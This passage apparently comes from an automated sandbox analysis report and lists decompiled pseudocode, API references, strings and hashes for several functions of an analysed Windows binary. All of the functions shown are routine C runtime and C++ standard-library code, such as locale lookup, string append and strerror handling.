Instruction ID: a34dd347909601c0f71b4f70a7763ce3286f87e5cdd314d47437a31ac3d788dd
Opcode Fuzzy Hash: d1a596b8e52ac0d2b0f2205af57a38b786808315dc1853f7977f804850a202d3
Instruction Fuzzy Hash: EC31A0319046049BDB14EF5CD891A9DB7B8FF24334F4201A6E856E72A1DB30AE45CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 008676F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008676F0(char _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v28;
				void* __edi;
				intOrPtr _t28;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t42;
				signed int _t45;
				signed int _t46;
				char _t47;
				signed int _t59;
				intOrPtr _t61;

				E008696AD( &_v16, 0);
				_t47 =  *0x88a71c;
				_v8 = _t47;
				if( *0x88a724 == 0) {
					E008696AD( &_v12, 0);
					if( *0x88a724 == 0) {
						_t45 =  *0x8888e4; // 0x1
						_t46 = _t45 + 1;
						 *0x8888e4 = _t46;
						 *0x88a724 = _t46;
					}
					E008696D5( &_v12);
				}
				_t59 =  *0x88a724;
				_t28 =  *_a4;
				if(_t59 >=  *((intOrPtr*)(_t28 + 0xc))) {
					_t61 = 0;
					goto L6;
				} else {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + _t59 * 4));
					if(_t61 != 0) {
						L18:
						E008696D5( &_v16);
						return _t61;
					} else {
						L6:
						if( *((char*)(_t28 + 0x14)) == 0) {
							L9:
							if(_t61 != 0) {
								goto L18;
							} else {
								goto L10;
							}
						} else {
							_t42 = E008692A6();
							if(_t59 >=  *((intOrPtr*)(_t42 + 0xc))) {
								L10:
								if(_t47 == 0) {
									_t32 = E00867C60(_t58,  &_v8, _a4);
									__eflags = _t32 - 0xffffffff;
									if(_t32 == 0xffffffff) {
										E0086A1E7( &_v28, "bad cast");
										E0086BA71( &_v28, 0x88391c);
									}
									_t61 = _v8;
									 *0x88a71c = _t61;
									E008696AD( &_a4, 0);
									_t34 =  *((intOrPtr*)(_t61 + 4));
									__eflags = _t34 - 0xffffffff;
									if(_t34 < 0xffffffff) {
										_t37 = _t34 + 1;
										__eflags = _t37;
										 *((intOrPtr*)(_t61 + 4)) = _t37;
									}
									E008696D5( &_a4);
									E0086922F(__eflags, _t61);
									goto L18;
								} else {
									E008696D5( &_v16);
									return _t47;
								}
							} else {
								_t58 =  *((intOrPtr*)(_t42 + 8));
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 8)) + _t59 * 4));
								goto L9;
							}
						}
					}
				}
			}

0x008676fe
0x0086770a
0x00867710
0x00867713
0x0086771a
0x00867726
0x00867728
0x0086772d
0x0086772e
0x00867733
0x00867733
0x0086773b
0x0086773b
0x00867743
0x00867749
0x0086774e
0x0086778f
0x00000000
0x00867750
0x00867753
0x00867758
0x008677f2
0x008677f5
0x00867802
0x0086775e
0x0086775e
0x00867762
0x00867774
0x00867776
0x00000000
0x00000000
0x00000000
0x00000000
0x00867764
0x00867764
0x0086776c
0x00867778
0x0086777a
0x0086779a
0x008677a2
0x008677a5
0x008677af
0x008677bd
0x008677bd
0x008677c2
0x008677ca
0x008677d0
0x008677d5
0x008677d8
0x008677db
0x008677dd
0x008677dd
0x008677de
0x008677de
0x008677e4
0x008677ea
0x00000000
0x0086777c
0x00867781
0x0086778e
0x0086778e
0x0086776e
0x0086776e
0x00867771
0x00000000
0x00867771
0x0086776c
0x00867762
0x00867758

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008676FE
std::_Lockit::_Lockit.LIBCPMT ref: 0086771A
std::bad_exception::bad_exception.LIBCMT ref: 008677AF
__CxxThrowException@8.LIBCMT ref: 008677BD
std::_Lockit::_Lockit.LIBCPMT ref: 008677D0
std::locale::facet::_Facet_Register.LIBCPMT ref: 008677EA

Strings

bad cast, xrefs: 008677A7

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 01702368d894c63a73e7da6e9bd39b0f5fd6c31f1c499029ac3db1478d7da614
Instruction ID: 4fc8d2ceaed1c8cf42cbbf3305f1f2c1ed0a79aadb78b91a44ef5fc2a5002165
Opcode Fuzzy Hash: 01702368d894c63a73e7da6e9bd39b0f5fd6c31f1c499029ac3db1478d7da614
Instruction Fuzzy Hash: F331C9319042149BDB14EF5CD881A9DB7B8FF14724F424166E956E72D1DB30AE45CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00870B25, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00870B25(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t40;
				void* _t41;

				_t31 = __ebx;
				_push(8);
				_push(0x8835f8);
				E00871820(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x880e40;
				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x885d60;
				E00871192(__ebx, 0xd);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				InterlockedIncrement( *(_t40 + 0x68));
				 *(_t41 - 4) = 0xfffffffe;
				E00870BC7();
				E00871192(_t31, 0xc);
				 *(_t41 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x885bb0; // 0x5f2e68
					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
				}
				E00870769( *((intOrPtr*)(_t40 + 0x6c)));
				 *(_t41 - 4) = 0xfffffffe;
				return E00871865(E00870BD0());
			}

0x00870b25
0x00870b25
0x00870b27
0x00870b2c
0x00870b36
0x00870b3c
0x00870b3f
0x00870b46
0x00870b4d
0x00870b50
0x00870b53
0x00870b5a
0x00870b61
0x00870b6a
0x00870b70
0x00870b77
0x00870b7d
0x00870b84
0x00870b8b
0x00870b91
0x00870b94
0x00870b97
0x00870b9c
0x00870b9e
0x00870ba3
0x00870ba3
0x00870ba9
0x00870baf
0x00870bc0

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,008835F8,00000008,00870C2D,00000000,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C), ref: 00870B36
__lock.LIBCMT ref: 00870B6A

Part of subcall function 00871192: __mtinitlocknum.LIBCMT ref: 008711A8
Part of subcall function 00871192: __amsg_exit.LIBCMT ref: 008711B4
Part of subcall function 00871192: EnterCriticalSection.KERNEL32(?,?,?,0086AB9D,00000008,00883270,00000020,0086ACDB,?,00000000,00000000,?,0086216D,00000000), ref: 008711BC

InterlockedIncrement.KERNEL32(00885D60), ref: 00870B77
__lock.LIBCMT ref: 00870B8B
___addlocaleref.LIBCMT ref: 00870BA9

Strings

KERNEL32.DLL, xrefs: 00870B31
h._, xrefs: 00870B9E

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL$h._
API String ID: 637971194-932962945
Opcode ID: 9a960479f8c01d433f993e96c38bcbe8dd83062be35210f0d6ec5e0c5ed4f6fb
Instruction ID: 8d385b019639762de27de2b3b3fda63409b02336ccf635d01a058913d9f10d65
Opcode Fuzzy Hash: 9a960479f8c01d433f993e96c38bcbe8dd83062be35210f0d6ec5e0c5ed4f6fb
Instruction Fuzzy Hash: FC013971445B00DED720AF6DD80A749BBE0FF50324F10C95AE5AAD66A5CBB4E6448F12

Uniqueness

Uniqueness Score: -1.00%

Function 00866C90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00866C90(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t21;
				intOrPtr* _t24;
				char* _t29;
				void* _t33;
				signed int _t34;
				intOrPtr _t37;
				intOrPtr* _t38;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr* _t50;

				_t50 = __esi;
				_t34 = __ecx;
				_t41 = _a8;
				_t33 = __eax;
				_t3 = _a4 + 0x10; // 0x1986e8
				_t19 =  *_t3;
				if(_t19 < _t41) {
					_t19 = E008695E5("invalid string position");
				}
				_t20 = _t19 - _t41;
				if(_t20 < _t33) {
					_t33 = _t20;
				}
				_t21 =  *((intOrPtr*)(_t50 + 0x10));
				if((_t34 | 0xffffffff) - _t21 <= _t33) {
					_t21 = E00869598("string too long");
				}
				if(_t33 == 0) {
					L24:
					return _t50;
				} else {
					_t45 = _t21 + _t33;
					if(_t45 > 0xfffffffe) {
						_t21 = E00869598("string too long");
					}
					_t37 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t37 >= _t45) {
						if(_t45 != 0) {
							goto L11;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if(_t37 < 0x10) {
								_t29 = _t50;
								 *_t29 = 0;
								return _t29;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E00866E50(_t50, _t45, _t21);
						_t41 = _a8;
						if(_t45 == 0) {
							L23:
							goto L24;
						} else {
							L11:
							_t38 = _a4;
							if( *((intOrPtr*)(_t38 + 0x14)) >= 0x10) {
								_t38 =  *_t38;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t24 = _t50;
							} else {
								_t24 =  *_t50;
							}
							E0086B710( *((intOrPtr*)(_t50 + 0x10)) + _t24, _t38 + _t41, _t33);
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t45)) = 0;
								goto L23;
							} else {
								 *((char*)( *_t50 + _t45)) = 0;
								return _t50;
							}
						}
					}
				}
			}

0x00866c90
0x00866c90
0x00866c93
0x00866c97
0x00866c9c
0x00866c9c
0x00866ca1
0x00866ca8
0x00866ca8
0x00866cad
0x00866cb1
0x00866cb3
0x00866cb3
0x00866cb5
0x00866cbf
0x00866cc6
0x00866cc6
0x00866ccd
0x00866d6b
0x00866d6f
0x00866cd3
0x00866cd4
0x00866cda
0x00866ce1
0x00866ce1
0x00866ce6
0x00866ceb
0x00866d17
0x00000000
0x00866d19
0x00866d19
0x00866d1f
0x00866d2e
0x00866d31
0x00866d36
0x00866d21
0x00866d24
0x00866d2b
0x00866d2b
0x00866d1f
0x00866ced
0x00866cf1
0x00866cf6
0x00866cfb
0x00866d6a
0x00000000
0x00866cfd
0x00866cfd
0x00866cfd
0x00866d08
0x00866d0a
0x00866d0a
0x00866d0f
0x00866d39
0x00866d11
0x00866d11
0x00866d11
0x00866d45
0x00866d51
0x00866d54
0x00866d66
0x00000000
0x00866d56
0x00866d58
0x00866d61
0x00866d61
0x00866d54
0x00866cfb
0x00866ceb

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00866CA8

Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 008695FA
Part of subcall function 008695E5: __CxxThrowException@8.LIBCMT ref: 0086960F
Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 00869620

std::_Xinvalid_argument.LIBCPMT ref: 00866CC6
std::_Xinvalid_argument.LIBCPMT ref: 00866CE1
_memmove.LIBCMT ref: 00866D45

Strings

string too long, xrefs: 00866CC1, 00866CDC
invalid string position, xrefs: 00866CA3

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 488e6abd57ee4c14ef681a3dfce67dfa7c4398394c5eeb9f4a9f7d979b4262d0
Instruction ID: 550bcecafeb679b1c244be94c91133128effcf3bbf3cfd27a751358bcbf5cbd6
Opcode Fuzzy Hash: 488e6abd57ee4c14ef681a3dfce67dfa7c4398394c5eeb9f4a9f7d979b4262d0
Instruction Fuzzy Hash: A321B6713006844BD725DE6CE891A2AF7E9FF95714F214A2EF492CB381E772DC508761

Uniqueness

Uniqueness Score: -1.00%

Function 00865C90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00865C90(signed int __edx, void* __edi, intOrPtr* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr* _t18;
				char* _t27;
				char _t32;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				intOrPtr* _t50;

				_t50 = __esi;
				_t49 = __edi;
				_t44 = __edx;
				_t15 =  *((intOrPtr*)(__esi + 0x10));
				if(_t15 < __edi) {
					_t15 = E008695E5("invalid string position");
				}
				_t37 = _a4;
				if((_t44 | 0xffffffff) - _t15 <= _t37) {
					_t15 = E00869598("string too long");
				}
				if(_t37 == 0) {
					L23:
					return _t50;
				} else {
					_t32 = _t15 + _t37;
					if(_t32 > 0xfffffffe) {
						_t15 = E00869598("string too long");
					}
					_t38 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t38 >= _t32) {
						if(_t32 != 0) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t32;
							if(_t38 < 0x10) {
								_t27 = _t50;
								 *_t27 = 0;
								return _t27;
							} else {
								 *((char*)( *_t50)) = _t32;
								return _t50;
							}
						}
					} else {
						E00866E50(_t50, _t32, _t15);
						if(_t32 == 0) {
							L22:
							goto L23;
						} else {
							L9:
							_t17 =  *((intOrPtr*)(_t50 + 0x14));
							if(_t17 < 0x10) {
								_t39 = _t50;
							} else {
								_t39 =  *_t50;
							}
							if(_t17 < 0x10) {
								_t18 = _t50;
							} else {
								_t18 =  *_t50;
							}
							E0086A290(_t18 + _t49 + _a4, _t39 + _t49,  *((intOrPtr*)(_t50 + 0x10)) - _t49);
							E00866E10(_t50, _t49, _a4, _a8);
							 *((intOrPtr*)(_t50 + 0x10)) = _t32;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t32)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t50 + _t32)) = 0;
								return _t50;
							}
						}
					}
				}
			}

0x00865c90
0x00865c90
0x00865c90
0x00865c93
0x00865c98
0x00865c9f
0x00865c9f
0x00865ca4
0x00865cae
0x00865cb5
0x00865cb5
0x00865cbc
0x00865d67
0x00865d6a
0x00865cc2
0x00865cc3
0x00865cc9
0x00865cd0
0x00865cd0
0x00865cd5
0x00865cda
0x00865cf7
0x00000000
0x00865cf9
0x00865cf9
0x00865cff
0x00865d0c
0x00865d0e
0x00865d13
0x00865d01
0x00865d03
0x00865d09
0x00865d09
0x00865cff
0x00865cdc
0x00865ce0
0x00865ce7
0x00865d66
0x00000000
0x00865ce9
0x00865ce9
0x00865ce9
0x00865cef
0x00865d16
0x00865cf1
0x00865cf1
0x00865cf1
0x00865d1b
0x00865d21
0x00865d1d
0x00865d1d
0x00865d1d
0x00865d32
0x00865d45
0x00865d4e
0x00865d51
0x00865d62
0x00000000
0x00865d53
0x00865d55
0x00865d5d
0x00865d5d
0x00865d51
0x00865ce7
0x00865cda

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00865C9F

Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 008695FA
Part of subcall function 008695E5: __CxxThrowException@8.LIBCMT ref: 0086960F
Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 00869620

std::_Xinvalid_argument.LIBCPMT ref: 00865CB5
std::_Xinvalid_argument.LIBCPMT ref: 00865CD0
_memmove.LIBCMT ref: 00865D32

Strings

string too long, xrefs: 00865CB0, 00865CCB
invalid string position, xrefs: 00865C9A

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 7a43652091bc17c3fcdd3b177c94ce1fea06858b6ca21e18830b3db148cd0a11
Instruction ID: 27d88af53b6933de4e52687316f46d2034712a04c73bfaf1f5c303d19a2a0388
Opcode Fuzzy Hash: 7a43652091bc17c3fcdd3b177c94ce1fea06858b6ca21e18830b3db148cd0a11
Instruction Fuzzy Hash: 4021E2713006444BD735AE6CE895D2EB7AAFF95710F610A1DF492CB6C1CB719C4487A1

Uniqueness

Uniqueness Score: -1.00%

Function 0086BF9A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0086BF9A(void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v12;
				intOrPtr _v44;
				void* __ebx;
				void* __ebp;
				intOrPtr _t19;
				intOrPtr _t21;
				void* _t27;
				intOrPtr _t30;
				char* _t31;
				char* _t32;
				void* _t34;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				void* _t45;
				signed int _t50;
				intOrPtr* _t51;
				void* _t54;
				char* _t55;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t59;

				_t54 = E00870BD9(_t34, _t45);
				if(_t54 == 0) {
					return "Visual C++ CRT: Not enough memory to complete call to strerror.";
				}
				if( *(_t54 + 0x24) == 0) {
					_t32 = E0086EBA2(0x86, 1);
					_pop(_t38);
					 *(_t54 + 0x24) = _t32;
					if(_t32 == 0) {
						_t31 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
						L5:
						return _t31;
					}
				}
				_t55 =  *(_t54 + 0x24);
				if(E0086F300(_t55, 0x86, E0086BF72(_a4)) == 0) {
					_t31 = _t55;
					goto L5;
				}
				E0086F29E();
				asm("int3");
				_t56 = __imp__DecodePointer;
				_t19 =  *_t56( *0x88b874, 0x86, _t55, 0, _t38, _t59, 0, 0, 0, 0, 0);
				_t36 = _t19;
				_v44 = _t36;
				_t57 =  *_t56( *0x88b870);
				if(_t57 < _t36) {
					L21:
					_t21 = 0;
				} else {
					_t50 = _t57 - _t36;
					_t6 = _t50 + 4; // 0x4
					if(_t6 < 4) {
						goto L21;
					} else {
						_t37 = E00872EF3(_t36);
						_t7 = _t50 + 4; // 0x4
						if(_t37 >= _t7) {
							L20:
							_t51 = __imp__EncodePointer;
							 *_t57 =  *_t51(_v0);
							 *0x88b870 =  *_t51(_t57 + 4);
							_t21 = _v0;
						} else {
							_t27 = 0x800;
							if(_t37 < 0x800) {
								_t27 = _t37;
							}
							_t28 = _t27 + _t37;
							if(_t27 + _t37 < _t37) {
								L17:
								_t9 = _t37 + 0x10; // 0x10
								_t29 = _t9;
								if(_t9 < _t37) {
									goto L21;
								} else {
									_t30 = E0086EBEE(_v12, _t29);
									if(_t30 == 0) {
										goto L21;
									} else {
										goto L19;
									}
								}
							} else {
								_t30 = E0086EBEE(_v12, _t28);
								if(_t30 != 0) {
									L19:
									_t57 = _t30 + (_t50 >> 2) * 4;
									__imp__EncodePointer(_t30);
									 *0x88b874 = _t30;
									goto L20;
								} else {
									goto L17;
								}
							}
						}
					}
				}
				return _t21;
			}

0x0086bfa6
0x0086bfac
0x00000000
0x0086bfae
0x0086bfbe
0x0086bfc3
0x0086bfc9
0x0086bfca
0x0086bfcf
0x0086bfd1
0x0086bfd6
0x00000000
0x0086bfd6
0x0086bfcf
0x0086bfde
0x0086bff3
0x0086bff5
0x00000000
0x0086bff5
0x0086bffe
0x0086c003
0x0086c00c
0x0086c019
0x0086c021
0x0086c023
0x0086c028
0x0086c02c
0x0086c0b3
0x0086c0b3
0x0086c032
0x0086c034
0x0086c036
0x0086c03c
0x00000000
0x0086c03e
0x0086c044
0x0086c046
0x0086c04c
0x0086c096
0x0086c099
0x0086c0a1
0x0086c0a9
0x0086c0ae
0x0086c04e
0x0086c04e
0x0086c055
0x0086c057
0x0086c057
0x0086c059
0x0086c05d
0x0086c06e
0x0086c06e
0x0086c06e
0x0086c073
0x00000000
0x0086c075
0x0086c079
0x0086c082
0x00000000
0x00000000
0x00000000
0x00000000
0x0086c082
0x0086c05f
0x0086c063
0x0086c06c
0x0086c084
0x0086c088
0x0086c08b
0x0086c091
0x00000000
0x00000000
0x00000000
0x00000000
0x0086c06c
0x0086c05d
0x0086c04c
0x0086c03c
0x0086c0b9

APIs

__getptd_noexit.LIBCMT ref: 0086BFA1

Part of subcall function 00870BD9: GetLastError.KERNEL32(00000001,00000000,0086AF99,0086DBEE,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD), ref: 00870BDD
Part of subcall function 00870BD9: ___set_flsgetvalue.LIBCMT ref: 00870BEB
Part of subcall function 00870BD9: __calloc_crt.LIBCMT ref: 00870BFF
Part of subcall function 00870BD9: DecodePointer.KERNEL32(00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD,?,?,?,0086AB9D), ref: 00870C19
Part of subcall function 00870BD9: GetCurrentThreadId.KERNEL32 ref: 00870C2F
Part of subcall function 00870BD9: SetLastError.KERNEL32(00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD,?,?,?,0086AB9D), ref: 00870C47

__calloc_crt.LIBCMT ref: 0086BFC3
__get_sys_err_msg.LIBCMT ref: 0086BFE1
_strcpy_s.LIBCMT ref: 0086BFE9
__invoke_watson.LIBCMT ref: 0086BFFE

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0086BFAE, 0086BFD1

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 5ad4042efd578ac88f630ffb31c084f83518fee7a2a5e843f799e3abec968f34
Instruction ID: 7a4ea22de1b5f92abb852339c12ba9bb795f2f013f5045e5750c972e637aa9cf
Opcode Fuzzy Hash: 5ad4042efd578ac88f630ffb31c084f83518fee7a2a5e843f799e3abec968f34
Instruction Fuzzy Hash: B2F0BB7250861467D7203D6F6C8186BB29CFB5072DB13443AF709D7613EE21DC814A52

Uniqueness

Uniqueness Score: -1.00%

Function 00863F30, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 469
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00863F30(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, signed int _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v5;
				short _v11;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v76;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t195;
				intOrPtr* _t197;
				signed int _t199;
				char _t204;
				intOrPtr _t205;
				intOrPtr* _t206;
				signed int _t209;
				char* _t210;
				void* _t214;
				void* _t215;
				void* _t216;
				intOrPtr* _t219;
				intOrPtr* _t221;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr _t241;
				intOrPtr* _t246;
				intOrPtr* _t248;
				intOrPtr* _t253;
				intOrPtr* _t256;
				intOrPtr _t257;
				intOrPtr* _t260;
				intOrPtr* _t264;
				intOrPtr* _t267;
				char* _t268;
				char* _t274;
				intOrPtr _t276;
				intOrPtr _t278;
				intOrPtr* _t289;
				signed int _t290;
				signed int _t303;
				intOrPtr* _t304;
				intOrPtr _t314;
				intOrPtr _t315;
				char* _t327;
				intOrPtr _t357;
				signed int _t359;
				intOrPtr _t363;
				intOrPtr _t386;
				signed int _t393;
				intOrPtr _t394;
				intOrPtr _t396;
				intOrPtr _t402;
				intOrPtr _t404;
				void* _t408;
				signed int _t409;
				intOrPtr* _t410;
				void* _t416;
				void* _t417;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t424;
				intOrPtr _t450;

				_t409 =  *( *(_a8 + 0x30));
				_v16 = _t409;
				E008696AD( &_v24, 0);
				_t195 =  *(_t409 + 4);
				if(_t195 < 0xffffffff) {
					 *(_t409 + 4) = _t195 + 1;
				}
				E008696D5( &_v24);
				_t197 = E008676F0( &_v16);
				_t417 = _t416 + 4;
				_t289 = _t197;
				_v36 = _t289;
				E008696AD( &_v16, 0);
				_t199 =  *(_t409 + 4);
				if(_t199 != 0 && _t199 < 0xffffffff) {
					 *(_t409 + 4) = _t199 - 1;
				}
				asm("sbb edi, edi");
				E008696D5( &_v16);
				_t393 =  !( ~( *(_t409 + 4))) & _t409;
				if(_t393 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t393))))(1);
				}
				 *((intOrPtr*)( *((intOrPtr*)( *_t289 + 0xc))))( &_v96);
				_t204 =  *((intOrPtr*)( *((intOrPtr*)( *_t289 + 8))))();
				_t410 = _a16;
				_v5 = _t204;
				_t205 =  *_t410;
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				if(_t205 == 0x2b) {
					L9:
					_v16 = 1;
				} else {
					_v16 = 0;
					_t433 = _t205 - 0x2d;
					if(_t205 == 0x2d) {
						goto L9;
					}
				}
				_t206 = E0086A96A(_t393, _t410, _t433);
				_t394 = _a32;
				_v12 =  *((intOrPtr*)( *_t206));
				_v11 = 0x65;
				_v28 = E0086A7E0(_t410, 0x65, _t394);
				_t209 = E0086A7E0(_t410, _v12, _t394);
				_t290 = _t209;
				_t419 = _t417 + 0x18;
				if(_t290 == 0) {
					_a28 = _t209;
				}
				_t314 = _v76;
				_t356 = _v96;
				_t210 = _t356;
				if(_t314 < 0x10) {
					_t210 =  &_v96;
				}
				if( *_t210 != 0x7f) {
					_t268 = _t356;
					if(_t314 < 0x10) {
						_t268 =  &_v96;
					}
					if( *_t268 > 0) {
						E008658E0(_t410,  &_v68, _t394);
						_t404 = _v28;
						if(_t404 != 0) {
							__eflags = _t290;
							if(_t290 == 0) {
								E00865A00( &_v68, _a20, 0x30);
								_a20 = _t290;
							}
							_t356 = _a28;
							__eflags = _t404 - _t410;
							E00865C90(_a28, _t404 - _t410,  &_v68, _a28, 0x30);
							_t410 = _a16;
						} else {
							E00865A00( &_v68, _a28, 0x30);
						}
						_push(0x30);
						if(_t290 != 0) {
							_t303 = _t290 - _t410;
							__eflags = _t303;
							_push(_a24);
							_t48 = _t303 + 1; // 0x1
							E00865C90(_t356, _t48,  &_v68);
							E00865C90(_a20, _t303,  &_v68, _a20, 0x30);
							_a24 = 0;
						} else {
							_push(_a20);
							E00865A00( &_v68);
						}
						_t304 = _v96;
						_a20 = 0;
						if(_v76 < 0x10) {
							_t304 =  &_v96;
						}
						_t274 = _v68;
						if(_v48 < 0x10) {
